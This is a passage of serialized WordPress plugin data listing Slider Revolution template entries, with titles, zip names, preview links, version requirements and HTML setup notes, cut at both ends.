class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/>For further configuration options please view the <a href=\"https://https://www.themepunch.com/slider-revolution/custom-css-javascript/\" target=\"_blank\">\"Custom CSS/JS\"</a> section in the slider settings.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:57;a:22:{s:2:\"id\";s:2:\"58\";s:5:\"title\";s:15:\"Rock Band Music\";s:5:\"alias\";s:8:\"rockband\";s:3:\"zip\";s:12:\"rockband.zip\";s:3:\"uid\";s:32:\"5f557a5fad2fd6ca982a6ae6e9619637\";s:3:\"img\";s:19:\"rockband/slide1.jpg\";s:7:\"preview\";s:80:\"http://revolution.themepunch.com/rock-band-music-theme-slider-revolution-plugin/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:140:\" <span class=\"ttm_content\">A rock band themed hero block slider with an embedded SoundCloud element.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:464:\"<span class=\"ttm_content\">This is a \"Default\" content hero slider. Just edit the slide to change the background video and texts.<br/><br/></span>\r\nScreencast for <a href=\"https://www.youtube.com/playlist?list=PLSCdqDWVMJPPXEuOEqYEQMAsp0vAYw52_\" target=\"_blank\">mobile video</a> considerations.</a>\r\n<br/><br/>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:58;a:22:{s:2:\"id\";s:2:\"59\";s:5:\"title\";s:18:\"Sleek Landing Page\";s:5:\"alias\";s:16:\"sleeklandingpage\";s:3:\"zip\";s:20:\"sleeklandingpage.zip\";s:3:\"uid\";s:32:\"07f7f2608936a8ae226213b7d99eee3f\";s:3:\"img\";s:27:\"sleeklandingpage/slide1.jpg\";s:7:\"preview\";s:70:\"http://revolution.themepunch.com/landing-page-free-wordpress-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.1.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:191:\"<span class=\"ttm_content\">A full-screen slider that can be used as an App-Landing-Page. The object layers and custom animations create a unique effect.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:415:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/>Some content is in <a href=\"https://www.themepunch.com/slider-revolution/global-layers/\" target=\"_blank\">\"Static / Global Layers\"</a><br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-22 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:59;a:22:{s:2:\"id\";s:2:\"60\";s:5:\"title\";s:16:\"App Landing Page\";s:5:\"alias\";s:14:\"applandingpage\";s:3:\"zip\";s:18:\"applandingpage.zip\";s:3:\"uid\";s:32:\"38eb600893c1484ab8fd2a3dce3678d7\";s:3:\"img\";s:25:\"applandingpage/slide1.jpg\";s:7:\"preview\";s:64:\"http://revolution.themepunch.com/app-landing-page-free-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:263:\"<span class=\"ttm_content\">A full-screen hero block that can be used as an app landing page. The detail view is build using <a href=\"https://www.themepunch.com/revslider-doc/layer-settings/#layeractions\">\"Layer Actions\"</a>.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:371:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/>It might be helpful to use the \"hide/show layer\" feature to efficiently edit all content.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:60;a:22:{s:2:\"id\";s:2:\"61\";s:5:\"title\";s:10:\"Desk Scene\";s:5:\"alias\";s:9:\"deskscene\";s:3:\"zip\";s:13:\"deskscene.zip\";s:3:\"uid\";s:32:\"172a1a89a3e3b333cb4dbeb238f534c5\";s:3:\"img\";s:20:\"deskscene/slide1.jpg\";s:7:\"preview\";s:49:\"http://revolution.themepunch.com/hero-desk-scene/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:135:\"<span class=\"ttm_content\">A beautiful desk scene with a cool reveal effect when scrolling down.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:300:\"<span class=\"ttm_content\">This is a \"Default\" content hero slider. Just edit the slide to change the background image and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:61;a:22:{s:2:\"id\";s:2:\"62\";s:5:\"title\";s:17:\"Clean News Slider\";s:5:\"alias\";s:15:\"cleannewsslider\";s:3:\"zip\";s:19:\"cleannewsslider.zip\";s:3:\"uid\";s:32:\"82c3f521fe31b80984be0f19e1a9899e\";s:3:\"img\";s:26:\"cleannewsslider/slide1.jpg\";s:7:\"preview\";s:55:\"http://revolution.themepunch.com/wordpress-news-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:132:\"<span class=\"ttm_content\">A slideshow example with clean content and thumbnail navigation.</span>\r\n<span class=\"ttm_space\"></span>\r\n\";s:11:\"setup_notes\";s:282:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Just edit the slides to change images and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:62;a:22:{s:2:\"id\";s:2:\"63\";s:5:\"title\";s:13:\"Image Gallery\";s:5:\"alias\";s:12:\"imagegallery\";s:3:\"zip\";s:16:\"imagegallery.zip\";s:3:\"uid\";s:32:\"cef1d75357df2cb53b990c74a214813e\";s:3:\"img\";s:23:\"imagegallery/slide1.jpg\";s:7:\"preview\";s:64:\"http://revolution.themepunch.com/wordpress-photo-gallery-plugin/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.0\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:3:\"667\";s:11:\"description\";s:239:\"<span class=\"ttm_content\">A photo gallery suitable to display your images using <a href=\"https://www.themepunch.com/revslider-doc/layer-settings/#layeractions\">\"Layer Actions\"</a> to their potential.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:415:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/>Some content is in <a href=\"https://www.themepunch.com/slider-revolution/global-layers/\" target=\"_blank\">\"Static / Global Layers\"</a><br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:63;a:22:{s:2:\"id\";s:2:\"64\";s:5:\"title\";s:19:\"Standard WP Gallery\";s:5:\"alias\";s:19:\"standard-wp-gallery\";s:3:\"zip\";s:23:\"standard-wp-gallery.zip\";s:3:\"uid\";s:32:\"632035b8a27652d8081dbdfa343dc93d\";s:3:\"img\";s:30:\"standard-wp-gallery/slide1.jpg\";s:7:\"preview\";s:64:\"http://revolution.themepunch.com/wordpress-photo-gallery-plugin/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.0\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:3:\"667\";s:11:\"description\";s:143:\"<span class=\"ttm_content\">A photo gallery that uses the \"Standard WP Gallery\" add-on to display images.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:407:\"<span class=\"ttm_content\">Please follow the setup guide on the \"Standard WP Gallery\" add-on page.<br/>Some content is in <a href=\"https://www.themepunch.com/slider-revolution/global-layers/\" target=\"_blank\">\"Static / Global Layers\"</a><br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:9:\"postbased\";}s:14:\"plugin_require\";s:166:\"[{\"path\":\"revslider-gallery-addon\\/revslider-gallery-addon.php\",\"name\":\"WP Gallery AddOn\",\"url\":\"http:\\/\\/revolution.themepunch.com\\/wordpress-photo-gallery-plugin\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:64;a:22:{s:2:\"id\";s:2:\"65\";s:5:\"title\";s:21:\"Clean News Post Based\";s:5:\"alias\";s:21:\"clean-news-post-based\";s:3:\"zip\";s:25:\"clean-news-post-based.zip\";s:3:\"uid\";s:32:\"f4cf5bbe51afa5a361754bb081cbabf2\";s:3:\"img\";s:32:\"clean-news-post-based/slide1.jpg\";s:7:\"preview\";s:55:\"http://revolution.themepunch.com/wordpress-news-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.0\";s:5:\"width\";s:4:\"1200\";s:6:\"height\";s:3:\"600\";s:11:\"description\";s:125:\"<span class=\"ttm_content\"> This slider is automatically populated by WordPress posts.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:423:\"<span class=\"ttm_content\">The content source is set to <a href=\"https://www.themepunch.com/slider-revolution/module-content/#flickr\" target=\"_blank\">\"Post-Based Slider\"</a>. Make sure to select the post type you want to display in the slider settings.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:9:\"postbased\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:65;a:22:{s:2:\"id\";s:2:\"66\";s:5:\"title\";s:22:\"Interactive Whiteboard\";s:5:\"alias\";s:21:\"interactivewhiteboard\";s:3:\"zip\";s:25:\"interactivewhiteboard.zip\";s:3:\"uid\";s:32:\"058b4af535d6c6c7bcec5225845e3eb4\";s:3:\"img\";s:32:\"interactivewhiteboard/slide1.jpg\";s:7:\"preview\";s:77:\"http://revolution.themepunch.com/interactive-whiteboard-animation-free-addon/\";s:7:\"version\";s:5:\"1.0.5\";s:8:\"required\";s:5:\"5.2.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:269:\"<span class=\"ttm_content\">This is the example slider from the Whiteboard add-on preview.<br/><a href=\"https://www.themepunch.com/revslider-doc/layer-settings/#layeractions\">\"Layer Actions\"</a> are used to achieve certain effects.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:541:\"<span class=\"ttm_content\">This slider template requires the <a href=\"https://www.themepunch.com/slider-revolution/whiteboard-addon/\" target=\"_blank\">Whiteboard add-on</a> to be installed. Edit the slides to change images and texts.<br/>Some content is in <a href=\"https://www.themepunch.com/slider-revolution/global-layers/\" target=\"_blank\">\"Static / Global Layers\"</a><br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:185:\"[{\"path\":\"revslider-whiteboard-addon\\/revslider-whiteboard-addon.php\",\"name\":\"Whiteboard AddOn\",\"url\":\"http:\\/\\/revolution.themepunch.com\\/interactive-whiteboard-animation-free-addon\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:66;a:22:{s:2:\"id\";s:2:\"68\";s:5:\"title\";s:17:\"Innovation Slider\";s:5:\"alias\";s:10:\"innovation\";s:3:\"zip\";s:14:\"innovation.zip\";s:3:\"uid\";s:32:\"d3440b69126d9c186fddc713b18b0002\";s:3:\"img\";s:21:\"innovation/slide1.jpg\";s:7:\"preview\";s:68:\"https://revolution.themepunch.com/best-wordpress-slider-plugin-2016/\";s:7:\"version\";s:5:\"1.0.5\";s:8:\"required\";s:7:\"5.2.3.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:258:\"<span class=\"ttm_content\">A full-screen slider with an elegant fade-out parallax effect. <a href=\"https://www.themepunch.com/revslider-doc/layer-settings/#layeractions\">\"Layer Actions\"</a> are used for links on layers.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:493:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images, videos and texts.<br/>For further configuration options please view the <a href=\"https://https://www.themepunch.com/slider-revolution/custom-css-javascript/\" target=\"_blank\">\"Custom CSS/JS\"</a> section in the slider settings.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-03-29 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:67;a:25:{s:2:\"id\";s:2:\"69\";s:5:\"title\";s:25:\"Dark Content Block - Menu\";s:5:\"alias\";s:24:\"dark-fullsite-block-menu\";s:3:\"zip\";s:34:\"packs/dark-fullsite-block-menu.zip\";s:3:\"uid\";s:32:\"bf4bd226719d3c3d3146592976e31ca1\";s:3:\"img\";s:35:\"dark-fullsite-block-menu/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/dark-wordpress-parallax-theme/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.5\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:13:\"Fullsite Dark\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"2\";s:9:\"installed\";b:0;}i:68;a:25:{s:2:\"id\";s:2:\"70\";s:5:\"title\";s:25:\"Dark Content Block - Hero\";s:5:\"alias\";s:21:\"dark-fullsite-block-1\";s:3:\"zip\";s:31:\"packs/dark-fullsite-block-1.zip\";s:3:\"uid\";s:32:\"d8859245fe600288ca932dc29aca751f\";s:3:\"img\";s:32:\"dark-fullsite-block-1/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/dark-wordpress-parallax-theme/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.5\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:13:\"Fullsite Dark\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"2\";s:9:\"installed\";b:0;}i:69;a:25:{s:2:\"id\";s:2:\"71\";s:5:\"title\";s:26:\"Dark Content Block - About\";s:5:\"alias\";s:27:\"dark-fullsite-block-2-about\";s:3:\"zip\";s:37:\"packs/dark-fullsite-block-2-about.zip\";s:3:\"uid\";s:32:\"298401901521a197a8294c1b4f73df3e\";s:3:\"img\";s:38:\"dark-fullsite-block-2-about/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/dark-wordpress-parallax-theme/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.5\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:13:\"Fullsite Dark\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"2\";s:9:\"installed\";b:0;}i:70;a:25:{s:2:\"id\";s:2:\"72\";s:5:\"title\";s:29:\"Dark Content Block - Services\";s:5:\"alias\";s:30:\"dark-fullsite-block-3-services\";s:3:\"zip\";s:40:\"packs/dark-fullsite-block-3-services.zip\";s:3:\"uid\";s:32:\"8da3ed605472ed6a26c745fb52f85f82\";s:3:\"img\";s:41:\"dark-fullsite-block-3-services/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/dark-wordpress-parallax-theme/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.5\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:13:\"Fullsite Dark\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"2\";s:9:\"installed\";b:0;}i:71;a:25:{s:2:\"id\";s:2:\"73\";s:5:\"title\";s:29:\"Dark Content Block - Products\";s:5:\"alias\";s:30:\"dark-fullsite-block-4-products\";s:3:\"zip\";s:40:\"packs/dark-fullsite-block-4-products.zip\";s:3:\"uid\";s:32:\"99e4f40399d20261a6131043d0e50b0c\";s:3:\"img\";s:41:\"dark-fullsite-block-4-products/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/dark-wordpress-parallax-theme/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.5\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:422:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\r\n\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:13:\"Fullsite Dark\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"2\";s:9:\"installed\";b:0;}i:72;a:25:{s:2:\"id\";s:2:\"74\";s:5:\"title\";s:33:\"Dark Content Block - Testimonials\";s:5:\"alias\";s:34:\"dark-fullsite-block-5-testimonials\";s:3:\"zip\";s:44:\"packs/dark-fullsite-block-5-testimonials.zip\";s:3:\"uid\";s:32:\"2f9121e0eedd51afe85e233d0743acab\";s:3:\"img\";s:45:\"dark-fullsite-block-5-testimonials/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/dark-wordpress-parallax-theme/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.5\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:13:\"Fullsite Dark\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"2\";s:9:\"installed\";b:0;}i:73;a:25:{s:2:\"id\";s:2:\"75\";s:5:\"title\";s:28:\"Dark Content Block - Callout\";s:5:\"alias\";s:29:\"dark-fullsite-block-6-callout\";s:3:\"zip\";s:39:\"packs/dark-fullsite-block-6-callout.zip\";s:3:\"uid\";s:32:\"55fbecb113ff21f050be7adc08637329\";s:3:\"img\";s:40:\"dark-fullsite-block-6-callout/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/dark-wordpress-parallax-theme/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.5\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:13:\"Fullsite Dark\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"2\";s:9:\"installed\";b:0;}i:74;a:25:{s:2:\"id\";s:2:\"76\";s:5:\"title\";s:27:\"Dark Content Block - Footer\";s:5:\"alias\";s:28:\"dark-fullsite-block-7-footer\";s:3:\"zip\";s:38:\"packs/dark-fullsite-block-7-footer.zip\";s:3:\"uid\";s:32:\"2ff517f5c7c54e3e0c2dd733cfd3400e\";s:3:\"img\";s:39:\"dark-fullsite-block-7-footer/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/dark-wordpress-parallax-theme/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.5\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution 